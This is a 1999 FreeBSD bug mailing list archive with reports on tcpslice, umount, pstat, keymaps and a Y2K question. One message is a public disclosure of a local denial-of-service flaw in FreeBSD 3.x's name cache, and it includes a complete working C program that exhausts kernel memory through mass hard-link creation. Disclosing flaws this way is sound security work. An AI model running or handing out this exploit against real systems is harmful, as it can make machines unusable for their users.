Authority X-Mailer: Mozilla 4.61 [en] (X11; U; FreeBSD 4.0-CURRENT-0904 i386) X-Accept-Language: en MIME-Version: 1.0 To: "Holtgreive, William" Cc: "'freebsd-bugs@FreeBSD.ORG'" Subject: Re: BSD Y2K References: <951B30EE47A7D2118D4000A0C9EA357301649920@STLEXGSRV01> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Holtgreive, William" wrote: > > Hi, > > If we are using BSD 2.1 and install all 2.x applicable Y2K patches... can we > assume the O/S is compliant or do we need to be on a 3.x version? You can't assume anything. 3.x-Stable is the latest version and fixes all bugs (Y2K and otherwise) that we know about, but we can't be responsible for ones we don't. The web page has more detailed Y2K info. Good luck, Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 19: 0:20 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from awfulhak.org (dynamic-119.max1-du-ws.dialnetwork.pavilion.co.uk [212.74.8.119]) by hub.freebsd.org (Postfix) with ESMTP id B1E6A14CC8; Fri, 10 Sep 1999 19:00:16 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from keep.lan.Awfulhak.org (root@keep.lan.Awfulhak.org [172.16.0.8]) by awfulhak.org (8.9.3/8.9.3) with ESMTP id XAA11686; Fri, 10 Sep 1999 23:20:36 +0100 (BST) (envelope-from brian@lan.awfulhak.org) Received: from keep.lan.Awfulhak.org (brian@localhost.lan.Awfulhak.org [127.0.0.1]) by keep.lan.Awfulhak.org (8.9.3/8.9.3) with ESMTP id XAA48056; Fri, 10 Sep 1999 23:25:19 +0100 (BST) (envelope-from brian@keep.lan.Awfulhak.org) Message-Id: <199909102225.XAA48056@keep.lan.Awfulhak.org> X-Mailer: exmh version 2.0.2 2/24/98 To: Joel Ray Holveck Cc: Brian Somers , Eivind Eklund , ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/7669: libalias does not IRC DCC packets under certain conditions In-reply-to: Your message of "10 Sep 1999 14:54:26 CDT." <86ogfa7dal.fsf@detlev.UUCP> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 10 Sep 1999 23:25:18 +0100 From: Brian Somers Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > so I'm happy if you decide whether the patch has a chance of > > working, and if it's worth testing. > > From the sounds of it it hasn't and isn't, so I'll silently duck back > > into my little corner and place the patch in the bit-bucket :-I > > I didn't review the patch closely, and would like to make sure that it > does what I think it does, so don't take my objections as permanant. > Does it? Could it be adapted to work with either address? I don't > know anything about the NAT internals, really. The libalias stuff is stateless at the moment. I guess it would be possible to store a small amount of state with the connections link structure - perhaps having a port-specific link allocation routing that allocates a bit extra for IRC ports and then uses that extra bit to remember which address to use. Of course this is assuming you can figure out which address should be used in time - maybe it's part of the initial conversation ? As I said, I know nothing about IRC, so I'm just speculating. > joelh > > -- > Joel Ray Holveck - joelh@gnu.org > Fourth law of programming: > Anything that can go wrong wi > sendmail: segmentation violation - core dumped -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 20: 4:54 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from bill-the-cat.mit.edu (BILL-THE-CAT.MIT.EDU [18.187.1.67]) by hub.freebsd.org (Postfix) with ESMTP id 6E45D14C4A for ; Fri, 10 Sep 1999 20:04:44 -0700 (PDT) (envelope-from root@ihack.net) Received: (from mycroft@localhost) by bill-the-cat.mit.edu (8.8.8/8.6.9) id XAA01570; Fri, 10 Sep 1999 23:04:38 -0400 (EDT) Date: Fri, 10 Sep 1999 23:04:38 -0400 (EDT) Message-Id: <199909110304.XAA01570@bill-the-cat.mit.edu> From: "Charles M. Hannum" To: bugtraq@securityfocus.com Cc: freebsd-bugs@freebsd.org Subject: FreeBSD-specific denial of service Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Here's an interesting denial-of-service attack against FreeBSD >=3.0 systems. It abuses a flaw in the `new' FreeBSD vfs_cache.c; it has no way to purge entries unless the `vnode' (e.g. the file) they point to is removed from memory -- which generally doesn't happen unless a certain magic number of `vnodes' is in use, and never happens when the `vnode' (i.e. file) is open. Thus it's possible to chew up an arbitrary amount of wired kernel memory relatively simply. What strikes me as funny about this is that the relevant code in 4.4BSD-Lite, which was in FreeBSD up through 2.2.8, was *not* susceptible to such an attack, and all of the code to prevent it was intentionally removed. I ran this on a machine running FreeBSD 3.2-RELEASE with 256MB of RAM, and it chugged along to about `02/03000' (meaning it created 3 files and about 63000 or so links), consuming a whopping 34MB of wired kernel memory (according to `top'), before all file system activity came to a screeching halt and the machine was unusable. This exploit does not affect Linux 2.0.36, or any version of NetBSD. I have not tested Linux versions >=2.1 (which have a different implementation of the equivalent code from 2.0.36), but based on code inspection, I do not believe it to be vulnerable to this particular attack. Note that, although it may seem like setting quotas is a good solution to this problem, if the FreeBSD system is acting as a NFS client, it's possible to use a variant of the attack that only creates one file and keeps at most one link to it at any given time. Also note that it may be possible to exercise this against a FTP server with a writable directory if the server has a way of creating hard links. (I'm not aware of any that do, but I point this out for completeness.) -----8<-----snip-----8<-----snip-----8<-----snip-----8<-----snip-----8<----- #include #include #include #define NFILE 64 #define NLINK 30000 #define NCHAR 245 int main() { char junk[NCHAR+1], dir[2+1+2+1], file1[2+1+2+1+NCHAR+3+1], file2[2+1+2+1+NCHAR+3+1]; int i, j; struct stat sb; memset(junk, 'x', NCHAR); junk[NCHAR] = '\0'; for (i = 0; i < NFILE; i++) { printf("\r%02d/%05d...", i, 0), fflush(stdout); sprintf(dir, "%02d-%02d", i, 0); if (mkdir(dir, 0755) < 0) fprintf(stderr, "mkdir(%s) failed\n", dir), exit(1); sprintf(file1, "%s/%s%03d", dir, junk, 0); if (creat(file1, 0644) < 0) fprintf(stderr, "creat(%s) failed\n", file1), exit(1); if (stat(file1, &sb) < 0) fprintf(stderr, "stat(%s) failed\n", file1), exit(1); for (j = 1; j < NLINK; j++) { if ((j % 1000) == 0) { printf("\r%02d/%05d...", i, j), fflush(stdout); sprintf(dir, "%02d-%02d", i, j/1000); if (mkdir(dir, 0755) < 0) fprintf(stderr, "mkdir(%s) failed\n", dir), exit(1); } sprintf(file2, "%s/%s%03d", dir, junk, j%1000); if (link(file1, file2) < 0) fprintf(stderr, "link(%s,%s) failed\n", file1, file2), exit(1); if (stat(file2, &sb) < 0) fprintf(stderr, "stat(%s) failed\n", file2), exit(1); } } printf("\rfinished successfully\n"); } -----8<-----snip-----8<-----snip-----8<-----snip-----8<-----snip-----8<----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 20:20: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5DB53152CF for ; Fri, 10 Sep 1999 20:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA64131; Fri, 10 Sep 1999 20:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from mailgate.spa.is.uec.ac.jp (ns.spa.is.uec.ac.jp [130.153.67.2]) by hub.freebsd.org (Postfix) with ESMTP id 4782514C4A for ; Fri, 10 Sep 1999 20:15:41 -0700 (PDT) (envelope-from tate@spa.is.uec.ac.jp) Received: from unzen.spa.is.uec.ac.jp (unzen.spa.is.uec.ac.jp [192.168.166.48]) by mailgate.spa.is.uec.ac.jp (8.9.3+3.1W/3.7W+spa-2.1) with ESMTP id MAA02238 for ; Sat, 11 Sep 1999 12:15:40 +0900 (JST) Received: by unzen.spa.is.uec.ac.jp (8.9.2/3.6W+spa-null-2.0b) id MAA55702; Sat, 11 Sep 1999 12:15:40 +0900 (JST) Message-Id: <199909110315.MAA55702@unzen.spa.is.uec.ac.jp> Date: Sat, 11 Sep 1999 12:15:40 +0900 (JST) From: TATEOKA Takamichi Reply-To: tate@spa.is.uec.ac.jp To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/13691: tcpslice cannot extract over 2GB part of trace file Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13691 >Category: bin >Synopsis: tcpslice cannot extract over 2GB part of trace file >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Sep 10 20:20:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Takamichi Tateoka >Release: FreeBSD 3.1-RELEASE i386 >Organization: University of Electro-Communications, Tokyo, JAPAN >Environment: FreeBSD-3.1 RELEASE on i386 (Pentium-II) >Description: The version of tcpslice cannot extract portions that stay on over 2GB part of original packet trace file. >How-To-Repeat: Create a large (over 2GB) trace file by tcpdump, and extract tail of it. Following is example: unzen:tate[13]% ls -l total 4806848 -rw-r--r-- 1 root wheel 4919795712 Sep 11 02:22 dump.fxp0.932014828 unzen:tate[14]% tcpdump -n -tt -r dump.fxp0.932014828 | grep ^9366804 | head tcpdump: pcap_loop: truncated dump file 936680400.586243 192.168.166.48.753 > 192.168.166.2.732: udp 76 936680400.587052 192.168.166.2.732 > 192.168.166.48.753: udp 68 (DF) 936680400.587164 192.168.166.48.753 > 192.168.166.2.732: udp 88 936680400.587752 192.168.166.2.732 > 192.168.166.48.753: udp 60 (DF) 936680400.587837 192.168.166.48.753 > 192.168.166.2.732: udp 88 936680400.588436 192.168.166.2.732 > 192.168.166.48.753: udp 76 (DF) 936680400.588522 192.168.166.48.753 > 192.168.166.2.732: udp 88 936680400.589109 192.168.166.2.732 > 192.168.166.48.753: udp 60 (DF) 936680400.589195 192.168.166.48.753 > 192.168.166.2.732: udp 88 936680400.589774 192.168.166.2.732 > 192.168.166.48.753: udp 60 (DF) 1585.854u 84.556s 29:02.78 95.8% 125+2247k 41333+267io 2pf+0w unzen:tate[15]% tcpslice -w /var/tmp/output 936680400.000000 936680500.000000 dump.fxp0.932014828 42.098u 30.661s 6:54.65 17.5% 15+208k 28177+43io 0pf+0w unzen:tate[16]% ls -l /var/tmp/output -rw-r--r-- 1 tate wheel 24 Sep 11 12:09 /var/tmp/output unzen:tate[17]% tcpdump -n -tt -r /var/tmp/output unzen:tate[18]% >Fix: I think that tcpslice uses "long" type variables instead of "off_t" type variables for search a posision of target portion. The program also uses fseek(3) which only takes "long" for file offset, we should use fsetpos(3) instead. Sorry, I can make a patch. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Sep 10 20:30: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E0D131530D for ; Fri, 10 Sep 1999 20:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA65264; Fri, 10 Sep 1999 20:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id 96B33152F7 for ; Fri, 10 Sep 1999 20:28:37 -0700 (PDT) (envelope-from logix@foobar.franken.de) Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id FAA04567; Sat, 11 Sep 1999 05:25:56 +0200 (CEST) Message-Id: <199909110325.FAA04567@foobar.franken.de> Date: Sat, 11 Sep 1999 05:25:56 +0200 (CEST) From: Harold Gutch Reply-To: logix@foobar.franken.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/13692: umount(8) does not unmount filesystems with a trailing slash Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13692 >Category: bin >Synopsis: umount(8) does not unmount filesystems with a trailing slash >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Sep 10 20:30:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Harold Gutch >Release: FreeBSD 2.2.8-STABLE i386 >Organization: >Environment: FreeBSD 2.2.8, the bug persists in 3.x as well >Description: umount(8) will not unmount a filesystem if a) you supply the directory-name instead of the devicenode (or host:directory-combination when using NFS) as an argument and b) the directory on which the filesystem is mounted (member f_mntonname of the struct statfs) has a trailing slash >How-To-Repeat: # mount_nfs remotehost:/remote/dir /local/dir/ # mount -t nfs remotehost:/remote/dir on /local/dir/ # umount /local/dir/ umount: /local/dir: not currently mounted # umount /local/dir umount: /local/dir: not currently mounted # umount remotehost:/remote/dir # mount -t nfs # Note: You will need to call mount_nfs, mount_cd9660, mount_msdos etc. directly, as mount(8) catches this and removes the trailing slash. >Fix: Apply this patch: --- umount.c.sav Thu Dec 4 08:36:22 1997 +++ umount.c Sat Sep 11 05:29:27 1999 @@ -282,23 +282,34 @@ { struct statfs *mntbuf; int i, mntsize; + char *longname; + + if (NULL == (longname = malloc(strlen(name) + 2))) + err(1, NULL); + strcpy(longname, name); + strcat(longname, "/"); if ((mntsize = getmntinfo(&mntbuf, MNT_NOWAIT)) == 0) { warn("getmntinfo"); + free(longname); return (NULL); } for (i = 0; i < mntsize; i++) { if ((what == MNTON) && !strcmp(mntbuf[i].f_mntfromname, name)) { if (type) *type = mntbuf[i].f_type; + free(longname); return (mntbuf[i].f_mntonname); } - if ((what == MNTFROM) && !strcmp(mntbuf[i].f_mntonname, name)) { + if (((what == MNTFROM) && (!strcmp(mntbuf[i].f_mntonname, name)) + || (!strcmp(mntbuf[i].f_mntonname, longname)))) { if (type) *type = mntbuf[i].f_type; + free(longname); return (mntbuf[i].f_mntfromname); } } + free(longname); return (NULL); } Alternatively mount_msdos, mount_cd9660 etc. need to be fixed to remove trailing slashes. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 1:11: 0 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from sevasoft.alex-ua.com (sevasoft.alex-ua.com [195.123.18.144]) by hub.freebsd.org (Postfix) with ESMTP id A106014C14; Sat, 11 Sep 1999 01:10:46 -0700 (PDT) (envelope-from seva@alex-ua.com) Received: from localhost (seva@localhost) by sevasoft.alex-ua.com (8.9.3/8.9.3) with ESMTP id LAA09234; Sat, 11 Sep 1999 11:10:44 +0300 (EEST) (envelope-from seva@alex-ua.com) X-Authentication-Warning: sevasoft.alex-ua.com: seva owned process doing -bs Date: Sat, 11 Sep 1999 11:10:44 +0300 (EEST) From: Vsevolod Lobko To: gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/13678: hard lockup's on tsleep in atapi_queue_cmd called at splbio from afd_start from afd_strategy In-Reply-To: <199909101100.EAA96325@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Seems that problem caused by lost interrupts and absence of interrupt timeout handling in atapi drivers Now I'm trying to add analog of wdtimeout for ata-disks from old drivers to new atapi-fd driver To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 3:16:25 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0208B14E51; Sat, 11 Sep 1999 03:16:23 -0700 (PDT) (envelope-from obrien@FreeBSD.org) Received: (from obrien@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA99053; Sat, 11 Sep 1999 03:16:23 -0700 (PDT) (envelope-from obrien@FreeBSD.org) Date: Sat, 11 Sep 1999 03:16:23 -0700 (PDT) From: Message-Id: <199909111016.DAA99053@freefall.freebsd.org> To: obrien@FreeBSD.org, freebsd-bugs@FreeBSD.org, obrien@FreeBSD.org Subject: Re: bin/13623: libxpg4.so.2.0 doesn't support zh_TW.Big5 locale Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: libxpg4.so.2.0 doesn't support zh_TW.Big5 locale Responsible-Changed-From-To: freebsd-bugs->obrien Responsible-Changed-By: obrien Responsible-Changed-When: Sat Sep 11 03:10:41 PDT 1999 Responsible-Changed-Why: I guess I'm the guilty on the compat22 scene. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 5: 2:54 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from smtp03.wxs.nl (smtp03.wxs.nl [195.121.6.37]) by hub.freebsd.org (Postfix) with ESMTP id 6789F150BC for ; Sat, 11 Sep 1999 05:02:51 -0700 (PDT) (envelope-from asmodai@wxs.nl) Received: from daemon.ninth-circle.org ([195.121.196.168]) by smtp03.wxs.nl (Netscape Messaging Server 3.61) with ESMTP id AAA1B3C for ; Sat, 11 Sep 1999 14:02:50 +0200 Received: (from asmodai@localhost) by daemon.ninth-circle.org (8.9.3/8.9.3) id OAA79256 for freebsd-bugs@freebsd.org; Sat, 11 Sep 1999 14:03:41 +0200 (CEST) (envelope-from asmodai) Date: Sat, 11 Sep 1999 14:03:41 +0200 From: Jeroen Ruigrok/Asmodai To: freebsd-bugs@freebsd.org Subject: Re: FreeBSD-specific denial of service Message-ID: <19990911140341.B78773@daemon.ninth-circle.org> References: <199909110304.XAA01570@bill-the-cat.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.7i In-Reply-To: <199909110304.XAA01570@bill-the-cat.mit.edu> Organisation: Ninth-Circle Enterprises Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please don't bother the security-officer about this one. He is informed. Thanks, -- Jeroen Ruigrok van der Werven/Asmodai asmodai(at)wxs.nl The BSD Programmer's Documentation Project Network/Security Specialist BSD: Technical excellence at its best Beauty is a short-lived reign... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 7:50: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from cs.rice.edu (cs.rice.edu [128.42.1.30]) by hub.freebsd.org (Postfix) with ESMTP id E056014F6A for ; Sat, 11 Sep 1999 07:49:59 -0700 (PDT) (envelope-from aron@cs.rice.edu) Received: (from aron@localhost) by cs.rice.edu (8.9.0/8.9.0) id JAA21956 for freebsd-bugs@freebsd.org; Sat, 11 Sep 1999 09:49:59 -0500 (CDT) Date: Sat, 11 Sep 1999 09:49:59 -0500 (CDT) From: Mohit Aron Message-Id: <199909111449.JAA21956@cs.rice.edu> To: freebsd-bugs@freebsd.org Subject: port /usr/ports/mail/mutt doesn't compile Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I tried installing mutt on my FreeBSD-3.2 machine by typing a make in /usr/ports/mail/mutt. Unfortunately, the compilation was terminated after several errors. Also I couldn't find a package for mutt in the FreeBSD package collection. Can mutt be made available for FreeBSD users. Thanks, - Mohit To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 8:10: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E4C21535F for ; Sat, 11 Sep 1999 08:10:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA79379; Sat, 11 Sep 1999 08:10:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id F2B99152F3; Sat, 11 Sep 1999 08:09:06 -0700 (PDT) Message-Id: <19990911150906.F2B99152F3@hub.freebsd.org> Date: Sat, 11 Sep 1999 08:09:06 -0700 (PDT) From: monroyj@hotmail.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: bin/13697: pstat(8) command line option '-w' not functional Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13697 >Category: bin >Synopsis: pstat(8) command line option '-w' not functional >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Sep 11 08:10:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: J Monroy >Release: 3.1 >Organization: >Environment: FreeBSD vidi.mozie.com 3.1-RELEASE FreeBSD 3.1-RELEASE #0: Mon Jan 1 03:20:27 PST 1996 root@vidi.dnull.com:/usr/src/sys/compile/VIDI i386 >Description: pstat(8) has an option '-w'; it does not work. If used, the program returns with the terse usage message. >How-To-Repeat: pstat -n >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Sep 11 8:20:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 303EB14D7C for ; Sat, 11 Sep 1999 08:20:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA80633; Sat, 11 Sep 1999 08:20:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from inf6serv.rug.ac.be (inf6serv.rug.ac.be [157.193.40.7]) by hub.freebsd.org (Postfix) with ESMTP id 52DE5158E1 for ; Sat, 11 Sep 1999 08:12:38 -0700 (PDT) (envelope-from Michiel.DeWilde@rug.ac.be) Received: from eduserv2.rug.ac.be (mdewilde@eduserv2.rug.ac.be [157.193.40.10]) by inf6serv.rug.ac.be (8.9.0/8.9.0) with ESMTP id RAA06394 for ; Sat, 11 Sep 1999 17:12:36 +0200 (MET DST) Received: (from mdewilde@localhost) by eduserv2.rug.ac.be (8.9.0/8.9.0) id RAA04992 for FreeBSD-gnats-submit@freebsd.org; Sat, 11 Sep 1999 17:12:35 +0200 (MET DST) Message-Id: <199909111512.RAA04992@eduserv2.rug.ac.be> Date: Sat, 11 Sep 1999 17:12:35 +0200 (MET DST) From: "Michiel De Wilde" Reply-To: "Michiel De Wilde" To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/13698: A euro character for syscons. Get it here. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13698 >Category: misc >Synopsis: Here is: a euro character for syscons & improved keymaps. >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Sep 11 08:20:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Michiel De Wilde >Release: FreeBSD 3.2-RELEASE i386 >Organization: University of Ghent, Belgium >Environment: Any syscons virtual console. >Description: FreeBSD doesn't have a euro character when using syscons (pcvt neither, but I'll leave that to someone else). Furthermore, the Belgian iso keymap has some errors. >How-To-Repeat: In a virtual console, type alt-e. You get an e, not a euro sign. Use the Belgian keymap, activate caps lock and walk the keyboard. The 'm' will show up in lowercase. More errors are described and corrected in the fix. >Fix: Well, it's all in this tarred gzipped uuencoded file. It provides: * a program to insert a euro character into a font * the euro sign itself, in 8x8, 8x14 and 8x16 * how to adapt your keymap file to support the euro * a new Belgian iso keymap begin 644 syscons-euro.tar.gz M'XL(`+DUVC<``^U;:W?;QA'U5^-7K.4F(&6)(D#P(5MRFSI*FR9VVCS:IHG3 M@N!21`4"#!Z2%GW'.DN]B9O3N8G1TL0""[SH(DS@YU MD29'=_XW17G=8;^O[BCE#/M=$\O256HP'`R\GMOO#4'[`\VZ??VF[0^^.ZKX[$VXO_^?SWY%B52KWH5B$W$((E?MGW9KZUM M[K5;M[_NLK;^=1PD$]T)WN$8KUG_<+-7[O]=;S#LX_KO#8>[]?\^RM&^6LWZ M0_5C$087:N;#OSQ1\^12DU@%,W!2&$.;!(PJBHG&/A,U3>)<[1]90#6^5D_9 M3^ICK?X61A.-$NM^&`<1=%`G63Z)PG%G]KC:%B8WF](P/J^VZ32-2A?OG=\[;UTE+JDT\_/U/[:-R!VL>3>`2-V&$<0DL6_J2A M%[91UU1G191_YPR>@_8">RP>6=AAJEHXPKU3KVUAM+ZT.&JG"[`PG[;`>##L M8*_(_'-PX`<9&`_A"W2=5@7S6FAZ-[IJ/WAAU)U/*,^:#<;*N9ELZ2()FJLU>A`.9Y* M4@7[?K"MP28\H]-ILM`Q&^4^/]A+'XSWEJ:1PNFS;S[_O-F&)SAV;.<*N3B` MT#7H/O0.S#ZH)6F+IKS=8!$ZUK2HAQ89!I%\:X,HY-_0H,4IA](#=/,CNK#J3YOL0!6+B9]KE15!H+-L6D0=.B6PANBF091DN@R/Y3$9B<_V^TOG_^XPUX/U__`Z[N[]?\^RGWUIL6/J-N%2%1QLE!O`NH+ MHG"@IK-`;083/2[.;U*X4+,_M+$!MMGK(]D_VP;46M&#FMOKD9K+:D5D@/T[ MVX"J3"@\E.^Q6J_.BONV`;56]%%NLYI71]$@$XH!RENLUJ^C:)`)Q5!A3AF2 MVJ".X@?;@#13!@C%B-SIDMJPAJ)))A3'*+_'(XWJK&B0,07F21C)(;7C.HJ7 MM@&U%-C9=?NDUJVC>&4;4$M!T=DF.?UTOT91D17LQ\)TIX-Q:1_R2/^LLZ)! M)A08G6,F%9CHR(`FF5"@%V8YJ^7^>&VD)IE04'3Z;.Q'!%DR,Z`JFP2.`>H) M46!=O6&V?X)Q7E(#]W#:@*A,*#+H@I0:!.#*A M2284&)U10)?]K8$I>A2=/[*Q?ZE9C559=16S.RGQVAFK?244/0.:9$)!T3EA MM8_9ZTEN0)-,*"@ZIZSV"0$^KE]!DTPH*#K/6>T/!&-)F@Q-,J&@Z)RQVA]9 MK9)PFV1"0;GSWZSV)WM][IMD0D'1><%JGQ%@`/AB=$>^KMP:AP.AT1K2BG$&O9J1CVA5,SE,?_<@!,37SA4?1><7& M_JWFHE>552^6XDZ*SA>L]G>>$;Y/$6B2"05%9\!J3\2*%P8TR82"HO.2U?[* MQE['!C3)A(*B<\QJOV_B MWP"$`J-S>J&OX;89`>X,$&#S@P#Y/0M2O*,&DX.$='AXV/T1Q3)UZW(G!.!(*MZ3@X1T>'C8_")#?L9/'G1B, M(Z'HE10\O,/#P^:'*!SJU.=.#,:14'@E!0_O\/"P^2$*ESH-N!.#<204_9*" MAW=X^![/#^1W[#14]2`4@Y*"AW=Y^![/#^1WU!ZI>A"*84G!P[L\?(_G!_([ M:A^K>A"*D5`X/+S+P_=X?B"_XVEW53T(!9+%'*];`U,,D2SCEJU!*,KHA%0N M#Q@V!_6,*,KHA%0N#Q@V!Z$HHQ-2N3Q\V!R$HHQ.2.7E'?[&(!1E=$(JEZ=& MFX-0E-$)J5R>&FT.0E%&)Z1R>:*T.0A%&9V0RN52M#D(19D[(97+8\+-@2E& M9>Z$5"Z/"3<'H2BC$U*Y/";<'(2BC$Y(Y?)0:G,0"HQ.>;HC>X@F&"=T2R4@ M%!B=;_?L=]1_>PK:=YZPL8\)JIMD^WO;@%J*,CH=3IHN)\T>7U6\H7$Q70>A M6.9.3IHN)\T>7U6\D7$Q70>AP.A\N]O^8XS.E._BMP:AH'WGD;DQW!PX+H[Q ME.*,[!20A_;59_<-DWJ,T9GR[FMK$(HR=WK'VX-0+'-G=WL0BF7N=+8'H5CF MSM[V(!3+W-G?'H3"R)U;`U$X72-W;@U"8>3.K4$HC-RY-0A%[RX=\T2]!B1E MRI$08&R6.Q?_4J=K1WSS(&NB>B0496P.W.U!*,K8'/2V!Z$H8W/@;0]",=HJ MZ:]E"ZM\-F+_"W)0BWY`<"']MK'^D:T<2$=4US;]Z$3U,ZA#.+:5O$8FI45/ MJEW(VJ3U*6H)4P)U3WI_`76GMG=ATT,ITOH&M88*7VWCIU`.;AY*`_N&@3W# MP)YAH'.K@4/#P+YA8,\PL+8W&MCO&@:.N'Z-[=+[6[1/>O/#87EM;[+<,2P_9M?2DP=Z#%$:.#0,%.?$.(1T?H9# M']<-08;T#4-Z/,3<#^BG;JR/4[VL3W!E2YU^+7#P%JHT8V28,3#\U#?\U+O5 M3\>&GX:&GP:&>=ZM?G)7?G*[Q@SW^82RR%\:GH:Q_/18&GYL&"[Q&^@)QJ]' M2H%-OZF2TA-4DIGP%\G*-8;+DO-5>X#OCF#]EWZ/XTU+Y?V?+\\^^OCIV3L? MXS7O_WGTO;I%`SV`K@1R73)(J2*Y7/=*95ENM%]M"RG+::^Q<: M6]4B3>`".+?<]O(C$VJ?Z"Q,R^]-IFDR5T=%EAYE,+X^DD&/4)@=6;VV6NAT 